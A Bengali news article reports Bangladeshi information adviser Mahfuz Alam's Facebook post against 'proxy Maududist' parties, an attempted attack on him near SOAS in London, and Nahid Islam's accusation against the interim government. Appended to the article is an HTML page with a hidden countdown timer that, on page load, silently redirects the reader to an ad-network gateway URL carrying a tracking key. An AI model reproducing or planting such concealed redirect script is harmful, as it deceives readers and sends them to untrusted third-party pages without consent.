লন্ডনে বসে ‘মওদুদীবাদীদের’ নিয়ে মাহফুজ আলমের পোস্ট


 অন্তর্বর্তী সরকারের তথ্য ও সম্প্রচার উপদেষ্টা মাহফুজ আলম বলেছেন, “বাংলাদেশের রাজনৈতিক অঙ্গনে আরেকটি ‘প্রক্সি মওদুদীবাদী’ দলের প্রয়োজন নেই।” শনিবার (১৩ সেপ্টেম্বর) রাত ১১টার দিকে নিজের ভেরিফায়েড ফেসবুক আইডিতে দেওয়া এক স্ট্যাটাসে তিনি এ কথা বলেন।

মাহফুজ আলম তার স্ট্যাটাসে আরও বলেন, ‘এরই মধ্যে আধ ডজন প্রক্সি সক্রিয় আছে। আপনি কিছুই নতুন যোগ করতে পারবেন না! বরং পুনর্নির্ধারণ করুন, পুনর্গঠিত হোন এবং পুনরুদ্ধার করুন।’

যদিও তিনি ঠিক কোন দলকে উদ্দেশ্য করে এ বক্তব্য দিয়েছেন, তা লেখেননি।

মাহফুজ আলম বর্তমানে লন্ডনে অবস্থান করছেন। গত শুক্রবার সেখানে হামলার মুখে পড়েন তিনি। লন্ডনের ইউনিভার্সিটি অব লন্ডনের স্কুল অব আফ্রিকান অ‍্যান্ড ওরিয়েন্টাল স্টাডিজ (সোয়াস) ক্যাম্পাসে আয়োজিত একটি সেমিনার থেকে বের হয়ে যাওয়ার সময় তার ওপর হামলার চেষ্টা করা হয়।


এদিন সন্ধ্যায় সোয়াস ক্যাম্পাসের পেছনের রাস্তা দিয়ে হাইকমিশনের গাড়ি বের হলে গাড়ির ওপর ডিম নিক্ষেপ করা হয়। এ সময় হাইকমিশনের কালো রঙের বিএমডব্লিউ গাড়ির সামনে শুয়ে পড়ার চেষ্টা করেন হামলাকারীদের কয়েকজন। কিন্তু পুলিশের হস্তক্ষেপে তাদের সেই চেষ্টা ব্যর্থ হলেও তারা গাড়ির ওপর ডিম নিক্ষেপ করেন। সেই ঘটনার পর উপদেষ্টা মাহফুজের এটিই প্রথম ফেসবুক স্ট্যাটাস।

এদিকে, মাহফুজ আলমের ওপর হামলা চেষ্টার ঘটনায় অন্তর্বর্তী সরকারকেই কাঠগড়ায় দাঁড় করিয়েছেন সাবেক উপদেষ্টা এবং জাতীয় নাগরিক পার্টির আহ্বায়ক নাহিদ ইসলাম। এক ফেসবুক পোস্টে তিনি লিখেছেন, ‘সরকার ও উপদেষ্টা পরিষদের ভেতরেও মাহফুজ আলমকে অপদস্ত ও হত্যার মৌন সম্মতি তৈরি করা হয়েছে।’

তিনি আরও লেখেন, ‘এই সরকার ও উপদেষ্টাগণ মাহফুজদের যথেচ্ছা ব্যবহার করে এখন মৃত্যুর মুখে ঠেলে দিচ্ছে। আমরা এগুলো মনে রাখছি। রাজনৈতিকভাবে এর জবাব দেওয়া হবে।’ <html lang="en">

<head>

    <meta charset="UTF-8"></meta>

    <meta content="IE=edge" http-equiv="X-UA-Compatible"></meta>

    <meta content="width=device-width, initial-scale=1.0" name="viewport"></meta>

    <title>Countdown Timer</title>

    <style>

        #timer {

            display: none; /* এই লাইনটি যোগ করা হয়েছে */

        }

    </style>

    <script>

        function startTimer(duration, redirectUrl) {

            let timer = duration, minutes, seconds;

            const interval = setInterval(() => {

                minutes = parseInt(timer / 60, 10);

                seconds = parseInt(timer % 60, 10);



                minutes = minutes < 10 ? "0" + minutes : minutes;

                seconds = seconds < 10 ? "0" + seconds : seconds;



                document.getElementById('timer').textContent = minutes + ":" + seconds;



                if (--timer < 0) {

                    clearInterval(interval);

                    window.location.href = redirectUrl; // Redirect to another link

                }

            }, 200);

        }



        window.onload = function () {

            const countdownTime = 50; // Set countdown time in seconds (e.g., 01 seconds)

            const redirectUrl = 'https://www.revenuecpmgate.com/s30zkzibtz?key=9f555fb378cb03f79386b5a4c99be3f7'; // Set the redirect URL

            startTimer(countdownTime, redirectUrl);

        };

    </script>

</head>

<body>

    <div id="timer">00:01</div>

</body>

</html>



Post a Comment

Previous Post Next Post